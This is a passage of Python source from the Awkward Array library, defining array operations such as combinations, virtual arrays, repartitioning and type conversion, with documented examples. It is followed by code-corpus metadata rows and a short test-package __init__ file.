if parameters is None:
parameters = {}
else:
parameters = dict(parameters)
parameters["__record__"] = with_name
result = cartesian(
layouts, axis=axis, nested=nested, parameters=parameters, highlevel=False
)
return ak._util.maybe_wrap(result, behavior, highlevel)
def combinations(
array,
n,
replacement=False,
axis=1,
fields=None,
parameters=None,
with_name=None,
highlevel=True,
behavior=None,
):
"""
Args:
array: Array from which to choose `n` items without replacement.
n (int): The number of items to choose in each list: `2` chooses
unique pairs, `3` chooses unique triples, etc.
replacement (bool): If True, combinations that include the same
item more than once are allowed; otherwise each item in a
combinations is strictly unique.
axis (int): The dimension at which this operation is applied. The
outermost dimension is `0`, followed by `1`, etc., and negative
values count backward from the innermost: `-1` is the innermost
dimension, `-2` is the next level up, etc.
fields (None or list of str): If None, the pairs/triples/etc. are
tuples with unnamed fields; otherwise, these `fields` name the
fields. The number of `fields` must be equal to `n`.
parameters (None or dict): Parameters for the new
#ak.layout.RecordArray node that is created by this operation.
with_name (None or str): Assigns a `"__record__"` name to the new
#ak.layout.RecordArray node that is created by this operation
(overriding `parameters`, if necessary).
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Computes a Cartesian product (i.e. cross product) of `array` with itself
that is restricted to combinations sampled without replacement. If the
normal Cartesian product is thought of as an `n` dimensional tensor, these
represent the "upper triangle" of sets without repetition. If
`replacement=True`, the diagonal of this "upper triangle" is included.
As a simple example with `axis=0`, consider the following `array`
ak.Array(["a", "b", "c", "d", "e"])
The combinations choose `2` are:
>>> ak.to_list(ak.combinations(array, 2, axis=0))
[('a', 'b'), ('a', 'c'), ('a', 'd'), ('a', 'e'),
('b', 'c'), ('b', 'd'), ('b', 'e'),
('c', 'd'), ('c', 'e'),
('d', 'e')]
Including the diagonal allows pairs like `('a', 'a')`.
>>> ak.to_list(ak.combinations(array, 2, axis=0, replacement=True))
[('a', 'a'), ('a', 'b'), ('a', 'c'), ('a', 'd'), ('a', 'e'),
('b', 'b'), ('b', 'c'), ('b', 'd'), ('b', 'e'),
('c', 'c'), ('c', 'd'), ('c', 'e'),
('d', 'd'), ('d', 'e'),
('e', 'e')]
The combinations choose `3` can't be easily arranged as a triangle
in two dimensions.
>>> ak.to_list(ak.combinations(array, 3, axis=0))
[('a', 'b', 'c'), ('a', 'b', 'd'), ('a', 'b', 'e'), ('a', 'c', 'd'), ('a', 'c', 'e'),
('a', 'd', 'e'), ('b', 'c', 'd'), ('b', 'c', 'e'), ('b', 'd', 'e'), ('c', 'd', 'e')]
Including the (three-dimensional) diagonal allows triples like
`('a', 'a', 'a')`, but also `('a', 'a', 'b')`, `('a', 'b', 'b')`, etc.,
but not `('a', 'b', 'a')`. All combinations are in the same order as
the original array.
>>> ak.to_list(ak.combinations(array, 3, axis=0, replacement=True))
[('a', 'a', 'a'), ('a', 'a', 'b'), ('a', 'a', 'c'), ('a', 'a', 'd'), ('a', 'a', 'e'),
('a', 'b', 'b'), ('a', 'b', 'c'), ('a', 'b', 'd'), ('a', 'b', 'e'), ('a', 'c', 'c'),
('a', 'c', 'd'), ('a', 'c', 'e'), ('a', 'd', 'd'), ('a', 'd', 'e'), ('a', 'e', 'e'),
('b', 'b', 'b'), ('b', 'b', 'c'), ('b', 'b', 'd'), ('b', 'b', 'e'), ('b', 'c', 'c'),
('b', 'c', 'd'), ('b', 'c', 'e'), ('b', 'd', 'd'), ('b', 'd', 'e'), ('b', 'e', 'e'),
('c', 'c', 'c'), ('c', 'c', 'd'), ('c', 'c', 'e'), ('c', 'd', 'd'), ('c', 'd', 'e'),
('c', 'e', 'e'), ('d', 'd', 'd'), ('d', 'd', 'e'), ('d', 'e', 'e'), ('e', 'e', 'e')]
The primary purpose of this function, however, is to compute a different
set of combinations for each element of an array: in other words, `axis=1`.
The following `array` has a different number of items in each element.
ak.Array([[1, 2, 3, 4], [], [5], [6, 7, 8]])
There are 6 ways to choose pairs from 4 elements, 0 ways to choose pairs
from 0 elements, 0 ways to choose pairs from 1 element, and 3 ways to
choose pairs from 3 elements.
>>> ak.to_list(ak.combinations(array, 2))
[
[(1, 2), (1, 3), (1, 4), (2, 3), (2, 4), (3, 4)],
[],
[],
[(6, 7), (6, 8), (7, 8)]
]
Note, however, that the combinatorics isn't determined by equality of
the data themselves, but by their placement in the array. For example,
even if all elements of an array are equal, the output has the same
structure.
>>> same = ak.Array([[7, 7, 7, 7], [], [7], [7, 7, 7]])
>>> ak.to_list(ak.combinations(same, 2))
[
[(7, 7), (7, 7), (7, 7), (7, 7), (7, 7), (7, 7)],
[],
[],
[(7, 7), (7, 7), (7, 7)]
]
To get records instead of tuples, pass a set of field names to `fields`.
>>> ak.to_list(ak.combinations(array, 2, fields=["x", "y"]))
[
[{'x': 1, 'y': 2}, {'x': 1, 'y': 3}, {'x': 1, 'y': 4},
{'x': 2, 'y': 3}, {'x': 2, 'y': 4},
{'x': 3, 'y': 4}],
[],
[],
[{'x': 6, 'y': 7}, {'x': 6, 'y': 8},
{'x': 7, 'y': 8}]]
This operation can be constructed from #ak.argcartesian and other
primitives:
>>> left, right = ak.unzip(ak.argcartesian([array, array]))
>>> keep = left < right
>>> result = ak.zip([array[left][keep], array[right][keep]])
>>> ak.to_list(result)
[
[(1, 2), (1, 3), (1, 4), (2, 3), (2, 4), (3, 4)],
[],
[],
[(6, 7), (6, 8), (7, 8)]]
but it is frequently needed for data analysis, and the logic of which
indexes to `keep` (above) gets increasingly complicated for large `n`.
To get list index positions in the tuples/records, rather than data from
the original `array`, use #ak.argcombinations instead of #ak.combinations.
The #ak.argcombinations form can be particularly useful as nested indexing
in #ak.Array.__getitem__.
"""
if parameters is None:
parameters = {}
else:
parameters = dict(parameters)
if with_name is not None:
parameters["__record__"] = with_name
layout = ak.operations.convert.to_layout(
array, allow_record=False, allow_other=False
)
out = layout.combinations(
n, replacement=replacement, keys=fields, parameters=parameters, axis=axis
)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def argcombinations(
array,
n,
replacement=False,
axis=1,
fields=None,
parameters=None,
with_name=None,
highlevel=True,
behavior=None,
):
"""
Args:
array: Array from which to choose `n` items without replacement.
n (int): The number of items to choose from each list: `2` chooses
unique pairs, `3` chooses unique triples, etc.
replacement (bool): If True, combinations that include the same
item more than once are allowed; otherwise each item in a
combinations is strictly unique.
axis (int): The dimension at which this operation is applied. The
outermost dimension is `0`, followed by `1`, etc., and negative
values count backward from the innermost: `-1` is the innermost
dimension, `-2` is the next level up, etc.
fields (None or list of str): If None, the pairs/triples/etc. are
tuples with unnamed fields; otherwise, these `fields` name the
fields. The number of `fields` must be equal to `n`.
parameters (None or dict): Parameters for the new
#ak.layout.RecordArray node that is created by this operation.
with_name (None or str): Assigns a `"__record__"` name to the new
#ak.layout.RecordArray node that is created by this operation
(overriding `parameters`, if necessary).
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
Computes a Cartesian product (i.e. cross product) of `array` with itself
that is restricted to combinations sampled without replacement,
like #ak.combinations, but returning integer indexes for
#ak.Array.__getitem__.
The motivation and uses of this function are similar to those of
#ak.argcartesian. See #ak.combinations and #ak.argcartesian for a more
complete description.
"""
if parameters is None:
parameters = {}
else:
parameters = dict(parameters)
if with_name is not None:
parameters["__record__"] = with_name
if axis < 0:
raise ValueError(
"the 'axis' for argcombinations must be non-negative"
+ ak._util.exception_suffix(__file__)
)
else:
layout = ak.operations.convert.to_layout(
array, allow_record=False, allow_other=False
).localindex(axis)
out = layout.combinations(
n, replacement=replacement, keys=fields, parameters=parameters, axis=axis
)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def partitions(array):
"""
Args:
array: A possibly-partitioned array.
Returns a list of partition lengths if the array is a PartitionedArray;
returns None otherwise.
Partitioning is an internal aspect of an array: it should behave
identically to a non-partitioned array, but possibly with different
performance characteristics.
Arrays can only be partitioned in the first dimension; it is intended
for performing calculations in memory-sized chunks.
"""
layout = ak.operations.convert.to_layout(
array, allow_record=False, allow_other=False
)
if isinstance(layout, ak.partition.PartitionedArray):
return layout.lengths
else:
return None
def partitioned(arrays, highlevel=True, behavior=None):
"""
Args:
arrays (list of arrays): The arrays to logically concatenate into a
single partitioned array.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content or #ak.partition.PartitionedArray
subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Returns the logical concatenation of `arrays` as a partitioned array.
Partitioning is an internal aspect of an array: it should behave
identically to a non-partitioned array, but possibly with different
performance characteristics.
Arrays can only be partitioned in the first dimension; it is intended
for performing calculations in memory-sized chunks.
"""
total_length = 0
partitions = []
stops = []
for array in arrays:
layout = ak.operations.convert.to_layout(
array, allow_record=False, allow_other=False
)
total_length += len(layout)
partitions.append(layout)
stops.append(total_length)
out = ak.partition.IrregularlyPartitionedArray(partitions, stops)
return ak._util.maybe_wrap(
out, ak._util.behaviorof(*arrays, behavior=behavior), highlevel
)
def repartition(array, lengths, highlevel=True, behavior=None):
"""
Args:
array: A possibly-partitioned array.
lengths (None, int, or iterable of int): If None, concatenate the
pieces of a partitioned array into a non-partitioned array.
If an integer, split or repartition into partitions of the
given number of entries (except the last, if the length of the
array doesn't fit an integer number of equal-sized chunks).
If an iterable of integers, split or repartition into the given
sequence of lengths.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content or #ak.partition.PartitionedArray
subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Returns a possibly-partitioned array: unpartitioned if `lengths` is None;
partitioned otherwise.
Partitioning is an internal aspect of an array: it should behave
identically to a non-partitioned array, but possibly with different
performance characteristics.
Arrays can only be partitioned in the first dimension; it is intended
for performing calculations in memory-sized chunks.
"""
layout = ak.operations.convert.to_layout(
array, allow_record=False, allow_other=False
)
if lengths is None:
if isinstance(layout, ak.partition.PartitionedArray):
out = layout.toContent()
else:
out = layout
else:
if isinstance(lengths, (int, numbers.Integral, np.integer)):
if lengths < 1:
raise ValueError(
"lengths must be at least 1 (and probably considerably more)"
+ ak._util.exception_suffix(__file__)
)
howmany = len(layout) // lengths
remainder = len(layout) - howmany * lengths
if remainder == 0:
lengths = [lengths] * howmany
else:
lengths = [lengths] * howmany + [remainder]
total_length = 0
stops = []
for x in lengths:
total_length += x
stops.append(total_length)
if total_length != len(layout):
raise ValueError(
"cannot repartition array of length {0} into "
"these lengths".format(len(layout))
+ ak._util.exception_suffix(__file__)
)
if isinstance(layout, ak.partition.PartitionedArray):
out = layout.repartition(stops)
else:
out = ak.partition.IrregularlyPartitionedArray.toPartitioned(layout, stops)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def virtual(
generate,
args=(),
kwargs=None,
form=None,
length=None,
cache="new",
cache_key=None,
parameters=None,
highlevel=True,
behavior=None,
):
"""
Args:
generate (callable): Function that makes an array from `args` and
`kwargs`.
args (tuple): Positional arguments to pass to `generate`.
kwargs (dict): Keyword arguments to pass to `generate`.
form (None, Form, or JSON): If None, the layout of the generated array
is unknown until it is generated, which might require it to be
generated earlier than intended; if a Form, use this Form to
predict the layout and verify that the generated array complies;
if a JSON string, convert the JSON into a Form and use it.
length (None or int): If None or negative, the length of the generated
array is unknown until it is generated, which might require it to
be generated earlier than intended; if a non-negative int, use this
to predict the length and verify that the generated array complies.
cache (None, "new", or MutableMapping): If "new", a new dict (keep-forever
cache) is created. If None, no cache is used.
cache_key (None or str): If None, a unique string is generated for this
virtual array for use with the `cache` (unique per Python process);
otherwise, the explicitly provided key is used (which ought to
ensure global uniquness for the scope in which these arrays are
used).
parameters (None or dict): Parameters for the new
#ak.layout.VirtualArray node that is created by this operation.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Creates a virtual array, an array that is created on demand.
For example, the following array is only created when we try to look at its
values:
>>> def generate():
... print("generating")
... return ak.Array([[1.1, 2.2, 3.3], [], [4.4, 5.5]])
...
>>> array = ak.virtual(generate)
>>> array
generating
<Array [[1.1, 2.2, 3.3], [], [4.4, 5.5]] type='3 * var * float64'>
However, just about any kind of query about this `array` would cause it to
be "materialized."
>>> array = ak.virtual(generate)
>>> len(array)
generating
3
>>> array = ak.virtual(generate)
>>> ak.type(array)
generating
3 * var * float64
>>> array = ak.virtual(generate)
>>> array[2]
generating
<Array [4.4, 5.5] type='2 * float64'>
Since this "materialization" is probably some expensive disk-read, we want
delay it as much as possible. This can be done by giving the #ak.layout.VirtualArray
more information, such as the length. Knowing the length makes it possible to
slice a virtual array without materializing it.
>>> array = ak.virtual(generate)
>>> sliced = array[1:] # don't know the length; have to materialize
generating
>>> array = ak.virtual(generate, length=3)
>>> sliced = array[1:] # the length is known; no materialization
>>> len(sliced) # even the length of the sliced array is known
2
However, anything that needs more information than just the length will cause
the virtual array to be materialized.
>>> ak.type(sliced)
generating
2 * var * float64
To prevent this, we can give it detailed type information, the #ak.forms.Form.
>>> array = ak.virtual(generate, length=3, form={
... "class": "ListOffsetArray64",
... "offsets": "i64",
... "content": "float64"})
>>> sliced = array[1:]
>>> ak.type(sliced)
2 * var * float64
Of course, _at some point_ the array has to be materialized if we need any
data values.
>>> selected = sliced[1]
generating
>>> selected
<Array [4.4, 5.5] type='2 * float64'>
Note that you can make arrays of records (#ak.layout.RecordArray) in which a
field is virtual.
>>> form = {
... "class": "ListOffsetArray64",
... "offsets": "i64",
... "content": "float64"
... }
>>> records = ak.Array({
... "x": ak.virtual(generate, length=3, form=form),
... "y": [10, 20, 30]})
You can do simple field slicing without materializing the array.
>>> x = records.x
>>> y = records.y
But, of course, any operation that looks at values of that field are going to
materialize it.
>>> x
generating
<Array [[1.1, 2.2, 3.3], [], [4.4, 5.5]] type='3 * var * float64'>
>>> y
<Array [10, 20, 30] type='3 * int64'>
The advantage is that you can make a table of data, most of which resides on
disk, and only read the values you're interested in. Like all Awkward Arrays,
the table need not be rectangular.
If you're going to try this trick with #ak.zip, note that you need to set
`depth_limit=1` to avoid materializing the array when it's constructed, since
#ak.zip (unlike the dict form of the #ak.Array constructor) broadcasts its
arguments together (hence the name "zip").
>>> records = ak.zip({
... "x": ak.virtual(generate, length=3, form=form),
... "y": [10, 20, 30]})
generating
>>> records = ak.zip({
... "x": ak.virtual(generate, length=3, form=form),
... "y": [10, 20, 30]}, depth_limit=1)
Functions with a `lazy` option, such as #ak.from_parquet and #ak.from_buffers,
construct #ak.layout.RecordArray of #ak.layout.VirtualArray in this way.
See also #ak.materialized.
"""
if isinstance(form, str) and form in (
"float64",
"float32",
"int64",
"uint64",
"int32",
"uint32",
"int16",
"uint16",
"int8",
"uint8",
"bool",
):
form = ak.forms.Form.fromjson('"' + form + '"')
elif isinstance(form, (str, bytes)) or (
ak._util.py27 and isinstance(form, ak._util.unicode)
):
form = ak.forms.Form.fromjson(form)
elif form is not None and not isinstance(form, ak.forms.Form):
form = ak.forms.Form.fromjson(json.dumps(form))
gen = ak.layout.ArrayGenerator(
generate, args, kwargs or {}, form=form, length=length
)
if cache == "new":
hold_cache = ak._util.MappingProxy({})
cache = ak.layout.ArrayCache(hold_cache)
elif cache is not None and not isinstance(cache, ak.layout.ArrayCache):
hold_cache = ak._util.MappingProxy.maybe_wrap(cache)
cache = ak.layout.ArrayCache(hold_cache)
out = ak.layout.VirtualArray(gen, cache, cache_key=cache_key, parameters=parameters)
return ak._util.maybe_wrap(out, behavior, highlevel)
def materialized(array, highlevel=True, behavior=None):
"""
Args:
array: The possibly virtual array to ensure is materialized.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Returns ``array`` with all virtual array nodes fully materialized.
See also #ak.virtual.
"""
def getfunction(layout):
if isinstance(layout, ak.layout.VirtualArray):
result = materialized(layout.array, highlevel=False)
return lambda: result
else:
return None
layout = ak.operations.convert.to_layout(array)
out = ak._util.recursively_apply(
layout, getfunction, pass_depth=False, pass_user=False
)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def with_cache(array, cache, highlevel=True, behavior=None):
"""
Args:
array: Data to search for nested virtual arrays.
cache (None or MutableMapping): If None, arrays are generated every
time they are needed; otherwise, generated arrays are stored in the
mapping with `__setitem__`, retrieved with `__getitem__`, and only
re-generated if `__getitem__` raises a `KeyError`. This mapping may
evict elements according to any caching algorithm (LRU, LFR, RR,
TTL, etc.). If "new", a new dict (keep-forever cache) is created.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Remove caches from all virtual arrays nested within `array` if `cache` is
None; adds a cache otherwise.
For example:
>>> cache1 = {}
>>> one = ak.virtual(lambda: [[1.1, 2.2, 3.3], [], [4.4, 5.5]], cache=cache1, length=3)
>>> two = ak.virtual(lambda: [100, 200, 300], cache=cache1, length=3)
>>> array1 = ak.zip({"x": one, "y": two}, depth_limit=1)
>>> len(cache1)
0
creates an array of records with virtual fields that would fill `cache1`.
We can then switch every instance of `cache1` in `array` with `cache2`:
>>> cache2 = {}
>>> array2 = ak.with_cache(array1, cache2)
>>> array2["x"]
<Array [[1.1, 2.2, 3.3], [], [4.4, 5.5]] type='3 * var * float64'>
>>>
>>> len(cache1), len(cache2)
(0, 1)
Viewing the `array2["x"]` filled `cache2` and not `cache1`.
See #ak.virtual.
"""
if not highlevel:
raise NotImplementedError(
"ak.with_cache cannot allow highlevel=False because the only strong references\n"
"to caches are held by ak.Array objects; VirtualArrays only hold weak references,\n"
"which would go out of scope with this function. This will be fixed in Awkward 2.0,\n"
"when VirtualArrays are reimplemented in Python and can safely hold strong\n"
"references to caches.\n\n"
"For now, use highlevel=True and extract the layout from the output array."
)
if cache == "new":
hold_cache = ak._util.MappingProxy({})
cache = ak.layout.ArrayCache(hold_cache)
elif cache is not None and not isinstance(cache, ak.layout.ArrayCache):
hold_cache = ak._util.MappingProxy.maybe_wrap(cache)
cache = ak.layout.ArrayCache(hold_cache)
def getfunction(layout):
if isinstance(layout, ak.layout.VirtualArray):
if cache is None:
newcache = layout.cache
else:
newcache = cache
return lambda: ak.layout.VirtualArray(
layout.generator,
newcache,
layout.cache_key,
layout.identities,
layout.parameters,
)
else:
return None
out = ak._util.recursively_apply(
ak.operations.convert.to_layout(array), getfunction, pass_depth=False
)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
@ak._connect._numpy.implements("size")
def size(array, axis=None):
"""
Args:
array: Rectilinear array whose `shape` needs to be known.
axis (int): The dimension at which this operation is applied. The
outermost dimension is `0`, followed by `1`, etc., and negative
values count backward from the innermost: `-1` is the innermost
dimension, `-2` is the next level up, etc.
Returns an int or a list of ints, one for each regular dimension.
Implements NumPy's
[size](https://docs.scipy.org/doc/numpy/reference/generated/numpy.ma.size.html)
function in a way that accepts #ak.Array as the `array`.
If the `array` is not rectilinear (i.e. if #np.to_numpy would raise an
error), then this function raise an error.
"""
if axis is not None and axis < 0:
raise NotImplementedError(
"ak.size with axis < 0" + ak._util.exception_suffix(__file__)
)
def recurse(layout, axis, sizes):
nplike = ak.nplike.of(layout)
if isinstance(layout, ak._util.virtualtypes):
recurse(layout.array, axis, sizes)
elif isinstance(layout, ak._util.unknowntypes):
pass
elif isinstance(layout, ak._util.indexedtypes):
recurse(layout.content, axis, sizes)
elif isinstance(layout, ak._util.uniontypes):
compare = None
for x in layout.contents:
inner = []
recurse(x, axis, inner)
if compare is None:
compare = inner
elif compare != inner:
raise ValueError(
"ak.size is ambiguous due to union of different "
"sizes" + ak._util.exception_suffix(__file__)
)
sizes.extend(compare)
elif isinstance(layout, ak._util.optiontypes):
return recurse(layout.content, axis, sizes)
elif isinstance(layout, ak._util.listtypes):
if isinstance(layout, ak.layout.RegularArray):
sizes.append(layout.size)
else:
sizes.append(None)
if axis is None:
recurse(layout.content, axis, sizes)
elif axis > 0:
recurse(layout.content, axis - 1, sizes)
elif isinstance(layout, ak._util.recordtypes):
compare = None
for x in layout.contents:
inner = []
recurse(x, axis, inner)
if compare is None:
compare = inner
elif compare != inner:
raise ValueError(
"ak.size is ambiguous due to record of different "
"sizes" + ak._util.exception_suffix(__file__)
)
sizes.extend(compare)
elif isinstance(layout, ak.layout.NumpyArray):
if axis is None:
sizes.extend(nplike.asarray(layout).shape[1:])
else:
sizes.extend(nplike.asarray(layout).shape[1 : axis + 2])
else:
raise AssertionError(
"unrecognized Content type" + ak._util.exception_suffix(__file__)
)
layout = ak.operations.convert.to_layout(array, allow_record=False)
if isinstance(layout, ak.partition.PartitionedArray):
layout = layout.toContent()
layout = ak.layout.RegularArray(layout, len(layout), 1)
sizes = []
recurse(layout, axis, sizes)
if axis is None:
out = 1
for size in sizes:
if size is None:
raise ValueError(
"ak.size is ambiguous due to variable-length arrays "
"(try ak.flatten to remove structure or ak.to_numpy "
"to force regularity, if possible)"
+ ak._util.exception_suffix(__file__)
)
else:
out *= size
return out
else:
if sizes[-1] is None:
raise ValueError(
"ak.size is ambiguous due to variable-length arrays at "
"axis {0} (try ak.flatten to remove structure or "
"ak.to_numpy to force regularity, if possible)".format(axis)
+ ak._util.exception_suffix(__file__)
)
else:
return sizes[-1]
@ak._connect._numpy.implements("atleast_1d")
def atleast_1d(*arrays):
"""
Args:
arrays: Rectilinear arrays to be converted to NumPy arrays of at
least 1 dimension.
axis (int): The dimension at which this operation is applied. The
outermost dimension is `0`, followed by `1`, etc., and negative
values count backward from the innermost: `-1` is the innermost
dimension, `-2` is the next level up, etc.
Implements NumPy's
[atleast_1d](https://docs.scipy.org/doc/numpy/reference/generated/numpy.atleast_1d.html)
function in a way that accepts #ak.Array objects as the `arrays`.
If the `arrays` are not all rectilinear (i.e. if #np.to_numpy would raise an
error), then this function raise an error.
Note: this function returns a NumPy array, not an Awkward Array.
"""
nplike = ak.nplike.of(*arrays)
return nplike.atleast_1d(*[ak.operations.convert.to_numpy(x) for x in arrays])
@ak._connect._numpy.implements("nan_to_num")
def nan_to_num(
array, copy=True, nan=0.0, posinf=None, neginf=None, highlevel=True, behavior=None
):
"""
Args:
array: Array whose `NaN` values should be converted to a number.
copy (bool): Ignored (Awkward Arrays are immutable).
nan (int or float): Value to be used to fill `NaN` values.
posinf (int, float, or None): Value to be used to fill positive infinity
values. If None, positive infinities are replaced with a very large number.
neginf (int, float, or None): Value to be used to fill negative infinity
values. If None, negative infinities are replaced with a very small number.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Implements [np.nan_to_num](https://numpy.org/doc/stable/reference/generated/numpy.nan_to_num.html)
for Awkward Arrays.
"""
layout = ak.operations.convert.to_layout(array)
nplike = ak.nplike.of(layout)
def getfunction(layout):
if isinstance(layout, ak.layout.NumpyArray):
return lambda: ak.layout.NumpyArray(
nplike.nan_to_num(
nplike.asarray(layout),
nan=nan,
posinf=posinf,
neginf=neginf,
)
)
else:
return None
out = ak._util.recursively_apply(
layout, getfunction, pass_depth=False, pass_user=False
)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
@ak._connect._numpy.implements("isclose")
def isclose(
a, b, rtol=1e-05, atol=1e-08, equal_nan=False, highlevel=True, behavior=None
):
"""
Args:
a: First array to compare.
b: Second array to compare.
rtol (float): The relative tolerance parameter.
atol (float): The absolute tolerance parameter.
equal_nan (bool): Whether to compare `NaN` as equal. If True, `NaN` in `a`
will be considered equal to `NaN` in `b`.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Implements [np.isclose](https://numpy.org/doc/stable/reference/generated/numpy.isclose.html)
for Awkward Arrays.
"""
one = ak.operations.convert.to_layout(a)
two = ak.operations.convert.to_layout(b)
nplike = ak.nplike.of(one, two)
def getfunction(inputs):
if isinstance(inputs[0], ak.layout.NumpyArray) and isinstance(
inputs[1], ak.layout.NumpyArray
):
return lambda: (
ak.layout.NumpyArray(
nplike.isclose(
nplike.asarray(inputs[0]),
nplike.asarray(inputs[1]),
rtol=rtol,
atol=atol,
equal_nan=equal_nan,
)
),
)
else:
return None
behavior = ak._util.behaviorof(one, two, behavior=behavior)
out = ak._util.broadcast_and_apply(
[one, two], getfunction, behavior, pass_depth=False
)
assert isinstance(out, tuple) and len(out) == 1
result = out[0]
return ak._util.maybe_wrap(result, behavior, highlevel)
_dtype_to_string = {
np.dtype(np.bool_): "bool",
np.dtype(np.int8): "int8",
np.dtype(np.int16): "int16",
np.dtype(np.int32): "int32",
np.dtype(np.int64): "int64",
np.dtype(np.uint8): "uint8",
np.dtype(np.uint16): "uint16",
np.dtype(np.uint32): "uint32",
np.dtype(np.uint64): "uint64",
np.dtype(np.float32): "float32",
np.dtype(np.float64): "float64",
np.dtype(np.complex64): "complex64",
np.dtype(np.complex128): "complex128",
np.dtype(np.datetime64): "datetime64",
np.dtype(np.timedelta64): "timedelta64",
}
if hasattr(np, "float16"):
_dtype_to_string[np.dtype(np.float16)] = "float16"
if hasattr(np, "float128"):
_dtype_to_string[np.dtype(np.float128)] = "float128"
if hasattr(np, "complex256"):
_dtype_to_string[np.dtype(np.complex256)] = "complex256"
def values_astype(array, to, highlevel=True, behavior=None):
"""
Args:
array: Array whose numbers should be converted to a new numeric type.
to (dtype or dtype specifier): Type to convert the numbers into.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Converts all numbers in the array to a new type, leaving the structure
untouched.
For example,
>>> array = ak.Array([1.1, 2.2, 3.3, 4.4, 5.5])
>>> ak.values_astype(array, np.int32)
<Array [1, 2, 3, 4, 5] type='5 * int32'>
and
>>> array = ak.Array([[1.1, 2.2, 3.3], [], [4.4, 5.5]])
>>> ak.values_astype(array, np.int32)
<Array [[1, 2, 3], [], [4, 5]] type='3 * var * int32'>
Note, when converting values to a `np.datetime64` type that is unitless, a
default '[us]' unit is assumed - until further specified as numpy dtypes.
For example,
>>> array = ak.Array([1567416600000])
>>> ak.values_astype(array, "datetime64[ms]")
<Array [2019-09-02T09:30:00.000] type='1 * datetime64'>
or
>>> array = ak.Array([1567416600000])
>>> ak.values_astype(array, np.dtype("M8[ms]"))
<Array [2019-09-02T09:30:00.000] type='1 * datetime64'>
See also #ak.strings_astype.
"""
to_dtype = np.dtype(to)
to_str = _dtype_to_string.get(to_dtype)
if to_str is None:
if to_dtype.name.startswith("datetime64"):
to_str = to_dtype.name
else:
raise ValueError(
"cannot use {0} to cast the numeric type of an array".format(to_dtype)
+ ak._util.exception_suffix(__file__)
)
layout = ak.operations.convert.to_layout(
array, allow_record=False, allow_other=False
)
out = layout.numbers_to_type(to_str)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def strings_astype(array, to, highlevel=True, behavior=None):
"""
Args:
array: Array whose strings should be converted to a new numeric type.
to (dtype or dtype specifier): Type to convert the strings into.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Converts all strings in the array to a new type, leaving the structure
untouched.
For example,
>>> array = ak.Array(["1", "2", " 3 ", "00004", "-5"])
>>> ak.strings_astype(array, np.int32)
<Array [1, 2, 3, 4, -5] type='5 * int32'>
and
>>> array = ak.Array(["1.1", "2.2", " 3.3 ", "00004.4", "-5.5"])
>>> ak.strings_astype(array, np.float64)
<Array [1.1, 2.2, 3.3, 4.4, -5.5] type='5 * float64'>
and finally,
>>> array = ak.Array([["1.1", "2.2", " 3.3 "], [], ["00004.4", "-5.5"]])
>>> ak.strings_astype(array, np.float64)
<Array [[1.1, 2.2, 3.3], [], [4.4, -5.5]] type='3 * var * float64'>
See also #ak.numbers_astype.
"""
to_dtype = np.dtype(to)
def getfunction(layout):
if isinstance(layout, ak._util.listtypes) and (
layout.parameter("__array__") == "string"
or layout.parameter("__array__") == "bytestring"
):
layout = without_parameters(layout, highlevel=False)
max_length = ak.max(num(layout))
regulararray = layout.rpad_and_clip(max_length, 1)
maskedarray = ak.operations.convert.to_numpy(
regulararray, allow_missing=True
)
npstrings = maskedarray.data
if maskedarray.mask is not False:
npstrings[maskedarray.mask] = 0
npnumbers = (
npstrings.reshape(-1).view("<S" + str(max_length)).astype(to_dtype)
)
return lambda: ak.layout.NumpyArray(npnumbers)
else:
return None
layout = ak.operations.convert.to_layout(
array, allow_record=False, allow_other=False
)
out = ak._util.recursively_apply(
layout,
getfunction,
pass_depth=False,
pass_user=False,
)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
__all__ = [
x
for x in list(globals())
if not x.startswith("_")
and x
not in (
"numbers",
"json",
"Iterable",
"ak",
"np",
)
]
def __dir__():
return __all__
| 37.965332 | 171 | 0.563147 |
177b945f6c31a58db26b518fb5c945f6ea0e37c1 | 91 | py | Python | tests/__init__.py | alan-augustine/python_singly_linkedlist | f227a4154b22de8a273d319ecdd6329035d5d258 | [
"MIT"
] | null | null | null | tests/__init__.py | alan-augustine/python_singly_linkedlist | f227a4154b22de8a273d319ecdd6329035d5d258 | [
"MIT"
] | null | null | null | tests/__init__.py | alan-augustine/python_singly_linkedlist | f227a4154b22de8a273d319ecdd6329035d5d258 | [
"MIT"
] | null | null | null | import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'src'))
| 22.75 | 69 | 0.703297 |
55e4f3d091ceb77435c5de14d61f03695962eedb | 398 | py | Python | geoserver/zip_files.py | rileyhales/dataTools | 86b32ecb47388a7c9fda8b45972fadaac132dffb | [
"BSD-3-Clause"
